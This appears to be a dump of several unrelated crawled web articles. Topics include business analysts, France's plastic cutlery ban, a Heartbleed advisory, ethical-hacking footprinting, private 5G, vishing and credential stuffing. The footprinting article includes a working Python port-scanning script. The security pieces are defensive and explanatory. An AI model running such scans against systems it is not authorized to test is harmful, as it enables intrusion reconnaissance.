Business analysts use data to identify issues and solutions, yet they don't perform a deep technical analysis of the data; they operate at a conceptual level, defining approaches and interacting with stakeholders, and are mainly concerned with the data's business implications. Data analysts spend the majority of their time accumulating raw data from multiple sources, cleaning and reshaping it, and applying a range of specialized techniques to extract useful information and form conclusions.

Business analysts hold extensive experience in domains or industries like healthcare, e-commerce, or manufacturing, and they depend less on the technical aspects of analysis. Data analysts put more emphasis on the technical aspects of the analysis.

Business analysts need to be adept at modeling and gathering requirements. Data analysts require strong business intelligence and data mining skills, alongside dexterity with popular technologies like AI and machine learning.

For business analysts, a solid business administration background is a useful advantage, with many business analysts emerging from computer science, business, IT, management, or related backgrounds. For data analysts, a background in information technology or math is preferred, since an understanding of complex statistics, databases, and algorithms is required.

How to Become a Business Analyst?
A business analyst is accountable for understanding a business's evolving needs and providing technological solutions to improve its processes and systems. The business analyst is therefore frequently considered the link between the business and IT departments. Below you will find some of the necessary steps to become a business analyst:

Get an undergraduate degree in business administration, finance, or accounting
Beyond your four-year degree in business, you will need to get familiar with some computer programming. Business analyst jobs require varying degrees of technical proficiency; however, the more computer skills you have, the better you will look as a candidate.

Gain work experience
You can gain experience in a volunteer role with a small organization first, or take advantage of summer internship openings. If you are already working at an organization in a different role, offer to work on the kinds of projects that business analysts undertake. There are many transferable skills involved in working as a business analyst, and the role is wide-ranging. People can enter the field either with knowledge of a particular business domain, such as workflow, billing, or customer relations, or with knowledge of an industry, such as finance, telecommunications, or government. Once you are hired as an entry-level business analyst, make a point of gaining experience across various kinds of projects; later, you can specialize in the domain or industry that particularly interests you.

Earn a master's degree or obtain an advanced certificate
Numerous colleges offer master's degrees and graduate certificates in business analysis, which normally include courses in business data analytics, operations research, database analytics, and predictive analytics.
For those with advanced knowledge of business analysis, the International Institute of Business Analysis offers a professional certification called the Certified Business Analysis Professional.

(Related article: 7 Steps of Business Analytics Process)

"Business analysts must have a thick skin: thick enough to take feedback on documents and receive unexpected answers to questions!" - Laura Brandenburg

We can say that business analysts are an important part of any organization. In simple words, the business analyst's fundamental goal is enabling companies to cost-effectively implement technology solutions by specifying the requirements of a program and conveying them clearly to stakeholders, partners, and facilitators. While there are several different facets to the job, business analysts commonly follow a pattern of analyzing the situation, proposing remedies, and then carrying out those remedies in the shape of new or modified technology in the business. (Also read: 5 Ways in which Big Data Analytics is helping businesses).

A business analyst will be expected to conduct surveys and workshops, communicate with partners to understand the needs of the company, work with stakeholders to understand the service or product provided, and analyze and model data to support decisions. Business analysts must therefore continue to develop in their positions and stay abreast of technological improvements to stay relevant.
<urn:uuid:5ae3739e-bd23-44e2-af11-620c5d8b6ad4>
CC-MAIN-2024-38
https://www.analyticssteps.com/blogs/what-business-analyst-roles-skills-and-responsibilities
2024-09-12T20:05:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00376.warc.gz
en
0.940283
2,143
2.84375
3
Implications of France's Ban on Disposable Plastic Cutlery

In an effort to reduce environmental damage and carbon footprint, France is the first country to ban disposable plastic cutlery. The directive requires that plastic utensils be replaced, by January 2020, with eco-friendly products made with 50% biodegradable, compostable, and biologically sourced material. In context, this regulation supports France's "Energy Transition for Green Growth Act," an overarching law adopted in 2015 targeted at minimizing climate change issues.

The regulation puts pressure on the manufacturers of such cutlery to invest in the development of novel products with bio-based biodegradable content and introduce them by 2020. Moreover, the booming take-out, delivery, and food service & catering industry is deeply concerned about the detrimental impact this regulation will have on its revenues. Pack2GO Europe, headquartered in Brussels, is the first organization to react and oppose this ban, saying that it violates European Union laws on the free movement of goods. Pack2GO Europe is the industry association that represents Europe's top food-packaging manufacturers.

The French regulation targets disposable plastic products that have become notorious for their ability to increase litter, pollute the environment, and even pose risks to land and marine life. While these products are at the heart of the flourishing catering, take-out, and delivery food service business, they are also in most cases thrown away rather than recycled, and thus likely to end up in landfills.

The Pros and Cons of Disposable Plastic Cutlery

Reasons for the Popularity of Disposable Plastic Cutlery
The reasons for the rise in plastic cutlery usage (and thus the environmental concern) are as follows:

1. Disposable cutlery is usually manufactured from polystyrene or styrofoam, which is difficult to recycle and thus less likely to be part of a municipal recycling program. Even if an item is made of recyclable plastics, the convenience factor cannot be dislodged by revisiting the traditional concept of reusable metal or ceramic cutlery.

2. The overarching concept of disposable plastic cutlery is driven by fast modern lifestyles demanding convenience, and suggesting that these items be replaced by reusable silverware, steel, or ceramic utensils for take-outs and delivery is not practical for consumers who have adapted to plastic cutlery. The very idea of convenience (saving time, food on the go, not having to clean or wash after use, and just tossing the items into the trash along with leftover food, debris, and grease) is too powerful for consumers, and for take-out and delivery food service providers, to ignore.

3. Many consumers and food service businesses are already well oriented to easier, lower-stress lifestyles, family picnics and vacations, community get-togethers, and events that need quick and convenient food and beverage service for their members. Disposable cutlery makes all this possible, as the end users are likely to be people who have very tight schedules and cannot attend to dish-washing or even recycling efforts.

4. Many end users of disposable cutlery are those who do limited cooking, eating, and serving at home, and some of them (due to lifestyles or work environments) do not even have the time or the inclination to sit through dining in a restaurant.
Rather than being a challenge, this is seen as an opportunity for all types of restaurant owners (including fine dining) to earn additional revenue through take-outs and deliveries. Many eateries and restaurants have limited seating arrangements compared to demand, and take-outs and deliveries are considered win-win options. Take-out containers also help restaurants reduce food wastage by allowing leftover food to be taken home.

5. Used disposable utensils are usually loaded with food debris and grease. They range from small items (for example, forks, knives, and spoons) to large, complex items (for example, sectioned platters, lids, and trays of diverse plastic types) that are too inconvenient to clean or sort. Thus, they are disposed of all together in garbage bags and are more likely to go into a landfill than to be sorted.

6. The disposable plastics concept is well entrenched in the coffee and cola dispensing machine sector, and any change in cup material will impact business costs.

Biodegradable and Recycled Plastics: Are They Viable or Cost-Effective?
Biodegradable plastics are suggested as compostable options but, according to technical experts, are not yet fully developed in terms of meeting the functional requirements of disposable cutlery, sourcing raw materials, or being manufactured at acceptable cost and energy efficiency levels. Currently, disposable cutlery with biodegradable plastic content is not cost-effective for the majority of consumers or food service entities.

Supporters of eliminating or reducing disposable plastic usage cite as a major concern the large carbon footprint or environmental impact that occurs well before the plastics are even used. Plastic manufacturing and transportation require high levels of energy and resources that do not justify one-time use. Though recycled plastic seems to be a better option than virgin plastic, plastics in general contain known carcinogens and can leach toxic chemicals such as BPA into food and the environment when in landfills.

Other Plastic Items in Perspective

Disposable Plastic Water Bottles
Plastic utensils or cutlery are one of the four major disposable products that supporters of environmentally friendly initiatives usually list as offensive, alongside plastic grocery bags, plastic water bottles, and Ziploc bags. Plastic water bottles have received the most attention so far in terms of curbside municipal recycling programs, with 23-25% of used bottles being collected and recycled. Plastic grocery bags and Ziploc bags are more notorious and more likely to end up as garbage/waste and in landfills. For instance, in the United States only 6% of plastic waste is recycled.

Disposable Plastic Grocery Bags
The plastic cutlery ban is likely to be more difficult to enforce than the plastic grocery bag bans in effect in several countries, including France. Countries that have banned the use and distribution of disposable plastic grocery bags include France (as recently as July 2016), India, Bangladesh, China, Brazil, Mexico, Italy, and the United States (20 states, 132 cities). Countries in Africa, namely South Africa, Uganda, Somalia, Rwanda, Botswana, Kenya, and Ethiopia, have also banned plastic grocery bags. Countries that have imposed a tax on disposable plastic grocery bags include Germany, Ireland, Wales, Scotland, England, Australia, and Belgium. The idea of using reusable bags of thicker plastic or composite material, fabrics, or cloth is considered acceptable by many consumers.
Consumers are also encouraged by some major grocery chains to bring in their own bags, or are discouraged from using plastic grocery bags through a small fee per bag (previously provided as complimentary).

Plastic Packaging
Plastic packaging is somewhat different from disposable bags and cutlery, in that the packaging has a longer functional lifespan from the manufacturing facility through transportation, storage in the warehouse, on the retail shelf, and finally in the consumer's home. These packages (containers, bottles, jars, boxes, trays, and dispensers) are expected to be thicker and more durable, made with high-quality plastic, and subject to tighter regulatory compliance. Apart from some reuse potential at home, plastic packaging passes through more opportunities for recycling through city or provincial programs, and is thus less likely to end up in garbage bins and landfills. The food & beverage industry depends on plastic packaging to make its products safe, secure, lightweight, microwavable, temperature resistant, or sterilizable. Banning such plastic packaging would compromise the current state of the food & beverage industry, and is not likely to be a viable or necessary solution.

Banning disposable plastic cutlery is inconvenient for a large number of consumers and for the food service industry. Unlike the traditional options (durable, reusable cloth or other bags) that can replace disposable plastic grocery bags, the traditional options (metal or ceramic cutlery) for plastic utensils are not very practical. Municipal recycling programs for cutlery are not as well organized as those for plastic water bottles and other durable plastic packaging. Finding new, consumer-friendly ways to collect, sort, and recycle disposable plastic cutlery is probably the way forward, rather than simply banning it. However, only time will tell how regulatory authorities and the plastic cutlery industry work together in different countries following France's recent ban.
<urn:uuid:b61ed056-3f30-46e2-8115-5d3f8c90d6d0>
CC-MAIN-2024-38
https://dev.frost.com/growth-opportunity-news/disposable-plastics-and-recycling-trends/
2024-09-16T14:11:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00076.warc.gz
en
0.950743
1,787
2.984375
3
On April 7, 2014, a bug in the OpenSSL software library was announced by the OpenSSL organization. This bug, called Heartbleed, impacts versions 1.0.1 through 1.0.1f of OpenSSL. Heartbleed is not an SSL bug or a flaw in the SSL/TLS protocol; it's a bug in OpenSSL's implementation of SSL/TLS, which servers rely on to create secured connections online. Heartbleed affects nearly two-thirds of servers on the Internet. Chances are you administer a server affected by the Heartbleed bug or have received an email notification to update passwords because of Heartbleed.

According to the Heartbleed website hosted by Codenomicon, whose engineers were among those who discovered Heartbleed: "The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users."

A few things set Heartbleed apart from other bugs. The versions of OpenSSL that are vulnerable to Heartbleed are 1.0.1 through 1.0.1f, and 1.0.2-beta1. The 1.0.0 branch and earlier were not vulnerable, and the 1.0.1g version released yesterday fixes the vulnerability. (Version 1.0.2-beta2 will include the fix.) If your servers do not use version 1.0.1 through 1.0.1f or 1.0.2-beta1 of OpenSSL, or if they are compiled without the heartbeat extension, they are not vulnerable to Heartbleed. Microsoft-based platforms, which do not utilize OpenSSL, are unaffected by Heartbleed. Java, along with many other servers and network devices, does not use OpenSSL either. Some devices may still rely on OpenSSL, though, so it's best to contact your device manufacturer or the DigiCert 24/7 Technical Support team to verify whether you're vulnerable to Heartbleed. If you are using keystores and truststores, you are most likely using JSSE rather than OpenSSL and are not vulnerable to Heartbleed.

If you're unsure whether a site you administer or use is vulnerable, you can use the DigiCert Certificate Checker tool for free by going to digicert.com/help. The DigiCert Certificate Checker allows users to check the security of any site on the Internet using SSL Certificates from any certificate provider.

Although there are no documented cases of Heartbleed being exploited to date, because the attack is undetectable, it is impossible to say that no attempt has been made. Compromised data has yet to be linked to Heartbleed, but if your server is running a version of OpenSSL between 1.0.1 and 1.0.1f with the heartbeat extension enabled, you are potentially vulnerable to Heartbleed and should take the steps below to address it. If you have any question as to whether you are vulnerable, the latest version of DigiCert's free Certificate Inspector has added Heartbleed to the lengthy list of vulnerabilities it can detect.
To learn more and get access to this tool, visit https://www.digicert.com/heartbleed-bug-vulnerability.htm.

If you are vulnerable to Heartbleed, there are two steps you need to take: patch your server, then re-key your SSL Certificates. The order of these steps is very important: it's critical that you stop the bleeding before addressing the possible damage. Both steps need to be done as quickly as possible.

There are two main options for updating your server. You can either update to OpenSSL version 1.0.1g, or you can recompile your existing version of OpenSSL with -DOPENSSL_NO_HEARTBEATS. Neither option is inherently better than the other; different dependencies and situations call for different solutions. But you should take one of these actions immediately.

The first step in re-keying, whether you are a DigiCert customer or not, is to create a new key pair and Certificate Signing Request (CSR). DigiCert has very useful free tools to quickly create CSR generation commands. The last thing you want to do when racing to address Heartbleed is fumble with complicated shell commands. The DigiCert Easy CSR for Apache and the Exchange CSR Command Generator make it easy to re-key or create a new SSL Certificate. These tools are available to anyone, whether using DigiCert or another SSL Certificate provider.

If you are a DigiCert customer, re-keying is always free, easy, and nearly instantaneous. You will need to re-key every certificate that has been on a vulnerable server.

Now that Heartbleed has been made public, if you use one of the affected versions of OpenSSL, it is important that you address the issue. The DigiCert team is always available 24/7 to provide any assistance you may need in re-keying your DigiCert certificates or to answer any questions about Heartbleed. As a DigiCert policy, any SSL user, whether a DigiCert customer or not, can call, email, or live chat with us by visiting our Contact page at http://www.digicert.com/contact-digicert-inc.htm.
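As a script-level complement to the tools mentioned above, here is a minimal Python sketch that inspects the OpenSSL build the Python interpreter itself is linked against. It is a rough heuristic only: it does not check the copy your web server uses, and some distributions backport the fix without changing the version string, so treat the output as a hint rather than a verdict.

```python
import re
import ssl

def openssl_is_vulnerable(banner: str) -> bool:
    """Heuristic: Heartbleed affects OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1."""
    if "1.0.2-beta1" in banner:
        return True
    m = re.search(r"\b1\.0\.1([a-z]?)\b", banner)
    # Bare "1.0.1" and letters "a" through "f" fall in the vulnerable range.
    return bool(m) and (m.group(1) == "" or m.group(1) <= "f")

# ssl.OPENSSL_VERSION reports the build Python links against,
# e.g. "OpenSSL 1.0.1f 6 Jan 2014".
banner = ssl.OPENSSL_VERSION
verdict = "potentially VULNERABLE" if openssl_is_vulnerable(banner) else "not in the affected range"
print(banner, "->", verdict)
```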
<urn:uuid:42939168-e7bd-4842-aa29-2fe0e2bd9497>
CC-MAIN-2024-38
https://www.digicert.com/blog/heartbleed-openssl-fix
2024-09-16T13:38:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00076.warc.gz
en
0.912749
1,245
2.953125
3
Basic Principles of Ethical Hacking

Gathering information on the target system is the first stage in ethical hacking. Footprinting refers to the methods and strategies used to collect this data. Footprinting entails acquiring information on the network, the host, and the individuals who work there. It's a crucial step that any ethical hacker must complete in order to be successful. Footprinting aids in determining an organization's security posture. It enables an ethical hacker to obtain IP addresses, DNS information, operating systems, phone numbers, email addresses, and other useful data. Footprinting can give you a good idea of how seriously a company regards its security.

Attack surface reduction
Footprinting helps the ethical hacker understand the attack surface. One of the first things an ethical hacker will do is look at which ports are open and what the target system's characteristics are. What is the most straightforward method for reducing the attack surface? Make sure to close any ports that aren't in use. Although this is a fundamental notion, hackers love it when it is overlooked, and it frequently is!

Footprinting also aids in the creation of network maps for the target company. These network maps show the topology, routers, servers, and other important network components. Footprinting assists in identifying the specifics of network components and may even allow the ethical hacker to locate the components physically!
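As a concrete illustration of the "which ports are open" step, here is a minimal TCP connect scan in Python using only the standard library. The host, port list, and timeout below are illustrative assumptions; dedicated tools such as Nmap are far more capable, and you should only ever scan systems you are explicitly authorized to test.

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept TCP connections on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the connection succeeds,
            # an error code otherwise (refused, timed out, etc.).
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    # A handful of commonly exposed service ports, scanned against localhost.
    common = [21, 22, 25, 53, 80, 110, 143, 443, 3306, 3389]
    print(scan_ports("127.0.0.1", common))
```

Every port this sketch reports open is a door an ethical hacker will probe further, which is exactly why closing unused ports is the simplest attack surface reduction available.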
<urn:uuid:b13b6ec7-7854-47e8-91c4-ed9b539aef6c>
CC-MAIN-2024-38
https://cybersguards.com/basic-principles-of-ethical-hacking/
2024-09-20T03:42:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00676.warc.gz
en
0.885969
290
3.578125
4
We have heard about 5G for a few years now. Newer smartphones are all 5G-enabled. Service providers want you to get that new phone and experience 5G. If you have a 5G phone, you may have even noticed that downloads are faster (much faster if you happen to be in certain areas). However, 5G is probably not changing your life (yet). Better than 4G? Yes, but perhaps not a transformative experience.

While most consumers think that 5G is all about them, the truth is that 5G is ideal for addressing the networking needs of business and enterprise. Many of the new features of 5G may not even be noticed by consumers but will be game-changing for some companies. Some of these new capabilities will be offered by communications service providers (CSPs) to enterprises utilizing public 5G networks, but there is now an even more transformative option: private 5G networks.

Companies have long employed private wired and wireless networks (primarily Wi-Fi), as well as other network types, for their data needs, so why would an organization employ a private 5G network for data? A private 5G network is isolated and restricts the devices that connect to the network. Wireless networks (of any type) add a level of flexibility not available with wired networks; moving a connected device on a wired network may involve moving the network as well, a process that is often expensive and, in certain situations, not possible. Wi-Fi works great in many situations, but it cannot scale to the levels that cellular achieves. Cellular network technology provides several advantages, including being designed for mobility (moving devices) and connection reliability, supporting greater coverage due to increased power levels, and allowing for much higher device density. Private 5G networks are not likely to replace Wi-Fi and wired networks entirely; instead, they will cover use cases that the other technologies do not cover, or do not cover well.

In the telecom industry, technologies are often debated and discussed in great detail. However, the reason an enterprise decides to install a private 5G network is NOT about technology but about addressing business requirements that current networking options (Wi-Fi or wired networks) are not handling. Public and private 5G networks enable use cases that other wireless technologies do not, and those use cases pay dividends that can be measured financially and in improvements in efficiency and safety. Small improvements in efficiency can add up to millions of dollars in savings, and keeping employees safe matters well beyond the financial impact.

These dividend-paying use cases may sometimes be solved with public 5G. However, there are other situations in which private 5G networks become the best solution. For instance:
- Coverage issues may limit the public option. This is often the case in certain industries where public cellular coverage at a location is limited or nonexistent, e.g., underground mines or offshore oil rigs.
- While a facility may have adequate coverage outside, inside may be more challenging. Factories and warehouses are good examples, with both the building shell and its contents as potential sources of interference.
- Control of data can be a deciding factor. Some businesses require that their data never leave their control (for competitive or security reasons).

Most of the current activity in private 5G networks is with large enterprises in certain industries, such as mining, energy, manufacturing, and more.
As 5G evolves over the next decade or so, private 5G networks will evolve to support smaller companies in almost all industries.

The consumer market has long been the bread and butter for CSPs. The telecommunications industry is capital-intensive and requires heavy investment to compete, and CSPs have invested significantly in 5G. The stark truth is that CSPs depending solely on the consumer market for a return on investment will fail. 5G is designed with the enterprise market in mind and provides new capabilities that no other networking technology can provide. To achieve an acceptable return on their 5G investments, CSPs must better serve customers outside the consumer market. This may be with public 5G networks, or it may be by providing enterprises with private 5G networks (or perhaps some combination). Not all private 5G networks will involve CSPs, but perhaps the most lucrative will. CSPs must take advantage of this opportunity, and the most successful CSPs globally are actively involved in growing this market.

All private 5G networks will involve network infrastructure suppliers. As more of the world rolls out 5G, there will come a time of slower growth for network infrastructure suppliers and public 5G networks. With private 5G networks growing strongly, suppliers may not even notice the slowdown.

Private 5G networks have the potential to transform enterprise data communication needs AND enable CSPs to continue providing consumers and industry with ever-evolving communications services.

Troy M. Morley
Frost & Sullivan

Note: Some private cellular networks are starting out as 4G networks, but most will eventually upgrade to private 5G networks.
<urn:uuid:33c06fa3-fb00-491a-9435-343da3c61442>
CC-MAIN-2024-38
https://www.frost.com/growth-opportunity-news/why_private_5g-networks_will_be_game-changing_for_businesses/
2024-09-20T04:01:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00676.warc.gz
en
0.955039
1,036
2.546875
3
Nearly 1 in 3 Americans has fallen victim to a phone scam. According to a report from Truecaller, 59.4 million Americans lost a total of $29.8 billion to phone scams in the last year. Cybercriminals are getting sophisticated: they equip themselves with the latest technologies and leverage social engineering tactics to swindle unsuspecting targets.

Vishing, short for voice phishing, is a scam in which a person disguises themselves on the telephone to steal sensitive information from victims. Cybercriminals use clever social engineering tactics to persuade victims to give up their private information. In most vishing scams, callers pretend to be calling from the victim's bank, the tax department, a government office, and so on. The victim is led to believe that they are doing the right thing, since the language used by the cybercriminal is convincing and laced with threats that make the victim feel as if they have no option but to give up the information.

Cybercriminals attack both individuals and organizations. They may use the CEO's identity to call an employee and persuade them to transfer funds to a particular account, making the employee believe the transfer was made at the behest of the CEO.

Cisco's 2021 Cybersecurity Threat Trends report says that phishing accounts for more than 90% of data breaches. Vishing, smishing, and pharming are considered the most prevalent threats. Vishing scams are becoming mainstream, and they are incredibly easy to orchestrate; this is what makes vishing attacks a terrifying affair.

The main objective of a vishing attack is to gain access to sensitive financial information or the personal data of an individual. Vishing attacks are easier to commit than in-person attacks. Why? Because in a face-to-face attack, the chances of verifying the authenticity of the other person increase: you can ask the person to show their ID card, verification badge, or access card. That's exactly why vishing attacks are easier to perform, as the scammer can use many methods to con the victim. You can often identify a vishing scam based on the context of the call.

Most of us know someone who has been duped in this way. On average, Americans receive almost 31 spam calls per person per month. These are worrying numbers, as people's livelihoods are at stake. Let us look at some of the most common vishing techniques so that you can identify a vishing attack if you receive one.

VoIP-enabled vishing
VoIP technology makes the creation of fake numbers easy. Cybercriminals can create fake numbers that are difficult to track. They are made to appear local, or even come with a 1-800 prefix. Sophisticated cybercriminals will also create their VoIP numbers in such a way that they look as if they are coming from a legitimate government office or the victim's bank.

Caller ID spoofing
Just like VoIP-enabled vishing, cybercriminals use fake phone numbers by spoofing the caller ID. They pretend to be a caller from the government, the IRS, the police department, or a fraud-investigating agency. Since the modus operandi of these criminals usually entails posing as a figure of authority so that victims will share their private information, spoofing the caller ID to make the number look legitimate is pivotal.

Wardialing
In wardialing, hundreds or thousands of automated calls are made to hundreds or thousands of numbers. The intended victims may get a recording pressuring them to call the scammers back.
The vishers will say that they are calling on behalf of the tax department or the victim's bank. Wardialing usually focuses on a specific area code.

Dumpster diving
Some attackers collect phone numbers by digging through the dumpsters behind banks and other organizations. Using information gathered this way, they deliver a targeted vishing attack against the victim.

These are some of the ways in which vishing attacks take place. Being aware of them helps keep people from falling prey to such scams.

In one common scenario, the victim receives a pre-recorded message saying that there is something wrong with their tax return, and that if they don't call back immediately, an arrest warrant will be issued. In another, victims get an offer to invest in an "exciting" project or obtain a loan at a lower interest rate; since these kinds of transactions require financial information, the vishers persuade the victim to give up personal financial details, and if the visher convinces the victim that it is a genuine offer, the victim won't hesitate to share them.

Unfortunately, many vishing victims are elderly. These operations exploit the victim's circumstances to con them into giving up their personal data, promising a discount or a refund in return for their cooperation.

Since vishers hope to gain access to their victims' bank accounts, one of the most effective cons is to pose as an official from the bank. Using the bank's routing number (easily found online) and the victim's account number, the attacker can transfer funds out of the account. And all an attacker needs is a credit card number, expiry date, and security code to make purchases online or over the phone.

How to spot a vishing scam
It is not easy to recognize a vishing scam, as victims are not made to feel as if they are being conned. But if you are aware of how to spot a vishing scam, you might be able to save yourself.

No federal agency will contact you directly unless you've requested contact, and none will ever ask you for your financial information. In fact, anyone who calls you asking for your personal or financial information is a scammer. The caller will pretend that they are doing an audit or that they have to verify your information for "official" purposes. They will ask you to confirm your date of birth, name, address, bank account information, social security number, and other personally identifiable information (PII). To make themselves look legitimate, they will already possess some of this information and share it with you; their objective is to get the rest.

Vishers use threats of an impending arrest if you do not comply with their demands. They will say that you have not paid your taxes, or use fear to persuade you to do something. If you ever get a call like this, keep calm and hang up, then investigate whether the call was from a genuine source. It is most likely a scam.

How to prevent vishing attacks
While it is important that everyone knows how to spot a vishing attack, it is even more pertinent to take steps to prevent one from happening.

It is free to add your personal or home number to the National Do Not Call Registry. By doing so, you will stop getting unsolicited calls from telemarketers.

When you receive an automated message that asks you to press buttons on your phone, do not do it.
Cybercriminals use this button-pressing technique to identify people who are susceptible to such targeting. They may even record your voice and use it to navigate voice-automated phone menus.

Do not hesitate to ask the caller to identify themselves. Alternatively, you can use the internet to search for the caller and the company they claim to represent, and ask them for any other information that can be used to verify their identity.

If you receive a call from an unknown person, do not offer them any personal or confidential information. Even information as simple as the name of your high school could be the answer to a security question your bank asks to verify your identity. Scammers will try to sound nice to get access to your information; do not give in. If you think the caller might not be from a trustworthy source, hang up immediately. You can also look up the correct number of the organization they claimed to be from and cross-verify it.

Listen to the caller carefully and consider whether they are using social engineering techniques such as urgency, punishment, or fear to make you give up critical information. Another simple but highly effective way to avoid becoming a vishing victim is to not respond to unsolicited emails, outreach messages, or marketing communications. If the caller says that they are giving you a free prize, ask them for proof by requesting information that verifies the claim. Make sure you verify the identity of the caller before you give up even the tiniest piece of information.

Falling prey to a vishing scam can be mentally devastating and often results in a loss of resources, usually money. Educate yourself, your loved ones, and your colleagues on how to stay safe from vishing scams. If you have shared your personal or financial information recently and you suspect that the call might have been a vishing attempt, inform your financial institution and the relevant government agencies. Multiple agencies, such as the Federal Trade Commission (FTC), the Better Business Bureau (BBB), and the Internet Crime Complaint Center (IC3), are working against vishing scammers.

If vishing attacks have happened in an organization, create a procedure whereby employees are asked to report the calls, capturing the key details of each call. Create a plan in which your call center staff educate customers about the course of action to follow when they receive such calls. Let customers know that the bank will never call, text, or email asking them to provide their debit or credit card information; if they receive such calls, they should immediately hang up. Remind them that caller IDs can easily be spoofed. Ask customers to note the area codes they were requested to call. Inform the local FBI authorities or report the incident online so that they can handle it; the FBI can get the phone line shut down immediately, thereby preventing someone else from being defrauded. You can also report vishing calls to the Federal Trade Commission online.

Why bother recovering when you can prevent vishing attacks in the first place? Cyvatar was built on the concept of preventing attacks before they even hurt you. The best way to keep vishing attacks from succeeding is to avoid sharing sensitive information over the phone. With Cyvatar's end-to-end prevention, however, you can stop vishing attacks even before they happen.
Cyvatar protects your endpoints and prevents data exfiltration, ensuring that the phone numbers of clients and employees remain safe within each endpoint of your network. This helps keep attackers from getting the phone numbers needed to launch a vishing attack in the first place. Should things go south, Cyvatar and Cysurance's cybersecurity guarantee has your back and covers up to $100,000 in breach-related costs.
<urn:uuid:94a98bd2-0adc-40e3-ac7d-c97e652cad3a>
CC-MAIN-2024-38
https://cyvatar.ai/what-is-vishing/
2024-09-08T00:22:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00876.warc.gz
en
0.951592
2,295
2.640625
3
Credential stuffing is a form of cyber attack in which the criminal uses usernames and passwords collected from previous breaches to gain fraudulent access to user accounts. Cybercriminals have collected billions of login credentials over the years as a result of data breaches, and they use these credentials for spam, phishing, and account takeovers.

Credential stuffing is becoming a common way of exploiting stolen usernames and passwords. In this kind of attack, the cybercriminal uses a list of known valid credentials obtained from previous breaches instead of guessing passwords. These attacks have a higher chance of success and are easier to perform. Because people reuse the same password across different websites, a cybercriminal can steal data from low-profile websites and use it to gain access to high-profile websites holding sensitive data. Cybercriminals also sell stolen credentials and specialized tools, which enables successful automated credential stuffing attacks at scale; they compile "combo lists" gathered from different data breaches. Credential stuffing does not require much effort, special skill, or knowledge to launch.

How to detect and mitigate credential stuffing attacks
Cybercriminals launch these attacks through botnets and automated tools that support the use of proxies. The attackers shape their tools to mimic legitimate user agents so that requests appear to come from trusted people and sites, making it difficult to differentiate between the attack and legitimate login attempts. The risk of credential attacks on high-traffic websites is greater, as a sudden burst of login requests does not seem strange there. If the login failure rate increases sharply over a short period, a credential stuffing attack may be in progress.

Firms should add multi-factor authentication (MFA) to their security process; with MFA in place, account takeovers require far more effort to pull off en masse than plain credential stuffing. They should make MFA mandatory for all user accounts, or at least enable it for users who are determined to be at higher risk. Large companies monitor public data dumps and check whether the impacted email addresses exist in their systems; if they do, they should force password resets and strongly suggest enabling MFA.

Firms should also train their employees about password hygiene and cyber attacks. Password reuse is what makes credential stuffing work, so it's vital to discourage it. The use of password managers for generating unique and complex passwords should be encouraged within firms.
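As a toy illustration of the login-failure signal described above, here is a minimal Python sketch of a sliding-window monitor. The window length and threshold are illustrative assumptions, not recommendations; a production system would also segment failures by source IP, user agent, and geography before raising an alert.

```python
import time
from collections import deque

class FailureRateMonitor:
    """Flags a possible credential stuffing attack when the number of
    login failures inside a sliding time window exceeds a threshold."""

    def __init__(self, window_seconds=60, max_failures=100):
        self.window = window_seconds
        self.max_failures = max_failures
        self.failures = deque()  # timestamps of recent failed logins

    def record_failure(self, now=None):
        """Record one failed login; return True if the rate looks suspicious."""
        now = time.time() if now is None else now
        self.failures.append(now)
        # Drop failures that have aged out of the window.
        while self.failures and self.failures[0] < now - self.window:
            self.failures.popleft()
        return len(self.failures) > self.max_failures

monitor = FailureRateMonitor(window_seconds=60, max_failures=100)
# Called from the login handler on every failed attempt:
if monitor.record_failure():
    print("Spike in login failures: possible credential stuffing in progress")
```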
<urn:uuid:831d9908-904d-4a26-b25a-75061c3525b6>
CC-MAIN-2024-38
https://www.infoguardsecurity.com/how-to-prevent-detect-and-defend-against-credential-stuffing/
2024-09-08T00:40:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00876.warc.gz
en
0.940098
481
3.453125
3
Secure Alternatives to Single-Factor Authentication and Password Managers

Single-factor authentication is a method of signing in that matches one factor, usually a password, to a username to gain access to a website or network. Password and username combinations have been used for decades, and they remain the most common verification tool today. Despite its commonality, you should not use single-factor authentication to secure critical data. Learn more about this verification method and how to better protect your business.

Is Single-Factor Authentication Safe?
Single-factor authentication is not a safe verification option, because a single password credential is all that is needed to prove identity. Single passwords are often:
- Weak: Hackers can easily guess or crack passwords that use words found in the dictionary, personal information, or simple patterns. Hackers may discover your personal information or use bots to generate the right combination of numbers and letters.
- Common: Single-factor authentication is especially dangerous when you use the same password for multiple websites. If a hacker can crack it on one account, they can gain access to many different accounts.
- Vulnerable: Hackers use several tactics to steal passwords, including keylogging, phishing, and social engineering. With single-factor authentication, your account is instantly compromised once your password has been stolen.

